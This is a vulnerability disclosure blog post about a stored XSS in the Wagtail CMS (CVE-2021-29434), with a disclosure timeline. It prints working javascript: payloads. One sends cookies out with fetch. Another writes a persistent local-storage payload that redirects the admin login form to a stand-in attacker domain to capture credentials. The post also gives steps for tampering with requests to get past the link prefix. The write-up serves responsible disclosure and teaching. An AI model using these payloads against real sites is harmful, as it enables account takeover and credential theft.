Every now and then I like to do a bit of bug hunting in open source projects. I love the challenge. There might not be – and often isn’t – anything significant, but every now and again I find something interesting. This is one of those times.

Tl;dr

CVE-2021-29434: With editor permissions we can craft an XSS that, if triggered by a moderator or admin account, can be used to write to the browser’s local storage. Once the local storage key has been set we can steal the credentials for the user account that triggered the XSS, leading to full account takeover, even if the original XSS gets patched. You can find the advisory on Wagtail’s Github: https://github.com/wagtail/wagtail/security/advisories/GHSA-wq5h-f9p5-q7fx

Wagtail

Wagtail is an open source content management system (CMS). It’s written in Python and targets the Django ecosystem of web frameworks.

It doesn’t do much on its own. It’s used as a base and a custom application is built on top of it, utilising its API and features to get powerful content editors that help you focus on building content rather than developing features. This was an important thing to note when it came to testing, as you’ll see shortly.

Setup

To give credit to the Wagtail developers – getting this set up and functioning was fairly simple. Running everything in a Python virtual environment took no more than a couple of minutes before I had a local running instance that I could access and start playing with.

Or so I thought…

It was looking good. I could access the admin panel and accounts and create pages, but I was limited in what content I could create. This takes us back to what Wagtail is. It’s not a comprehensive web application for creating content, but a fully featured and extendable base application for content management.

I initially thought that I would have to build my own application that exposes the API to test all the features, which wasn’t something I wanted to invest time in. This was supposed to be a quick bug hunt after all.

Fortunately I didn’t have to, because Wagtail also ships a demo project called Bakery.

This demo site provides examples of common features and recipes to introduce you to Wagtail development. Beyond the code, it also lets you explore the admin and editorial interface of the CMS.

This seemed ideal for testing, and setting it up was much the same as before, except it also provides a docker-compose.yml file that delivers a more representative production environment with a “real” database, ElasticSearch and Redis, alongside the main application. I didn’t need this to get started, so I stuck with the Python virtual environment.

There were a couple of differences to the initial setup. Note the edit to the base.txt file to install the latest version of Wagtail instead of the pinned version.

Success! We now have a functional and locally running Wagtail instance that is more representative of a real installation.

Now we can start looking for vulnerabilities. I’ve always found XSS bugs the easiest to find – just look for anywhere a user has input and see what you can do with it.

After playing around with the different types of input, it looked like everything was being properly escaped when it was rendered or validated by the frontend. So, I changed tack and looked at the data that was being sent to the server to see if I could bypass any of the validation.

XSS

This is where we find the vulnerability. One of the RichText plugins allows you to add a link, and if we can control the URL, it may be possible to inject a javascript: href. This means anyone clicking the link would run the JavaScript we give it.

The above image doesn’t look happy. If we try each of the link types we can see that internal, external and email types all fail to validate on the server-side if we try to add a JavaScript src attribute.

Phone and anchor links, however, would allow us to set the URL and save it. Unfortunately, when this renders in the frontend it would prefix our attribute with either tel: or #, depending on the format we selected, effectively removing the XSS.

I had been focusing on the requests that would create the link element, trying to tamper with the data sent to the server to see if I could bypass or modify the data to remove the prefix that was being inserted.

Taking a step back, I looked at the POST request that was used to save the entire page contents instead of the POST request that saves the link we want to add. The link content was being set in this request as well.

With the request intercepted in Burp, I removed the # that was prefixing the URL attributed, and clicked “forward” to send the modified request to the server.

Success!

It requires interaction by someone clicking the link, but if they do, we get a successful XSS.

Weaponizing the XSS

With our XSS in place we needed to weaponize it, otherwise it wouldn’t have been an effective vulnerability. We had a couple of targets:

  • End users of the application
  • Moderators and admins

For most Wagtail implementations, I expected the end user wouldn’t pose much risk. They are unlikely to access any sensitive parts of the site or data after all.

Targeting moderators or admins is a higher risk, as we can make these changes with the lowest level of permissions – as an Editor.

Yes, there is social engineering at play here, and yes it may be obvious to admins and moderators. The focus here is not to create the most convincing lure – just to showcase the possibilities.

So let’s look at some payloads.

The obvious one here is to grab the sessionid from the cookie. Then we can impersonate the account by replacing our own session. This is as simple as reading the cookie value with document.cookie and posting it to our own domain with the fetch API.

javascript:fetch('https://127.0.0.1:8282/cookie?cookie='+document.cookie);

We got the cookie, but it didn’t have the session ID. This is because the cookie value was set to be HttpOnly, which means it couldn’t be accessed from JavaScript. We could also see a CSRF token, which means that trying to automate tasks like creating a new admin account or upgrading our account permissions is going to be a lot harder.

As I was looking for other places the session ID may be stored, I spotted something very strange in Local Storage.

Without getting into the specifics, Local Storage is a keypair value store that persists data in the local browser and, more importantly, JavaScript can read and write to it.

This particular key is being used to store SVG data that is used to show icons in the admin interface. I’m not going to lie: this was, and still is, very confusing to me. Why were the developers using local storage in this way? Other fonts and icons are loaded using Font Awesome.

So how can we abuse this? First, let’s see if we can get something in that will render into the browser.

The first attempt at writing script tags failed.

javascript:localStorage.setItem('wagtail:spriteData', '<script>alert("xss");</script>');

I think this is due to the way this element is rendered into the DOM: it never executes the script tags, but there are other ways.

javascript:localStorage.setItem('wagtail:spriteData', '<img src=1 onerror="javascript:alert(1)"></img>');

Intercepting the request as before, anyone clicking the link will see no visible change. However, if you navigate to the /admin pages, the local storage code is written to the DOM, and our XSS fires. In fact, our XSS fires every time the admin page is visited in this browser – and even works if the user is logged out.

Now we have enough to build a full exploit chain:

  • Edit a page or element that will let us add or modify a link element
  • Set the type to anchor link
  • Set the URL to match the code block below
  • Insert the anchor
  • Save draft or publish the page and intercept the request
  • Remove the # from the URL and forward the modified request

javascript:localStorage.setItem('wagtail:spriteData', '<img src=1 onerror="javascript:window.onload = function(){let form = document.getElementsByTagName(\'form\')[0]; form.action = \'https://evildomain.com/login.html\'; form.method = \'get\';}"></img>');

There is a lot going on here, so let’s break it down.

When the link is clicked a key named wagtail:spriteData in local storage is updated, and its value it set to:

'<img src=1 onerror="javascript:window.onload = function(){let form = document.getElementsByTagName(\'form\')[0]; form.action = \'https://evildomain.com/login.html\'; form.method = \'get\';}"></img>'

Now, every time the user visits the login page and this code is loaded from local storage, the img tag is created with a bad src ,which means the code in onerror will run.

The JavaScript code in onerror will wait for the page to finish loading. Once the page is ready it will look for an HTML form. If it finds a form, it will change the action to point to a domain controlled by the attacker. We also set the method to GET instead of POST, but that’s just to make this easier to demonstrate.

The result is that the next time the target user attempts to log in, they will actually send us their credentials.

There are a few more steps you would need to take to make this truly effective, but what I’ve shared should indicate the types of attack that can be attempted if you can chain a few components together.

Disclosure timeline

Wagtail is open source and uses GitHub as its code repository. When I was looking for a responsible way to disclose the vulnerabilities, I found its security policy with ease. More open-source projects should use this feature.

30 Mar 2021: Initial email with details of both components sent to [email protected]

1 April 2021: Response from Wagtail confirming the validity of the XSS and querying the local storage element

1 April 2021: Agree the second component is not strictly a vulnerability

8 April 2021: Github draft advisory created

19 April 2021: Security advisory published

Labs

If you are a commercial customer with us wanting to gain practical experience in identifying and remediating XSS vulnerabilities in Python web application frameworks, check out these labs:

Kev Breen

Kev Breen,
Director of Cyber Threat Research,
Immersive Labs

@kevthehermit

 

Check Out Immersive Labs in the News.

Published

April 30, 2021

Topics

Research

WRITTEN BY

Immersive Labs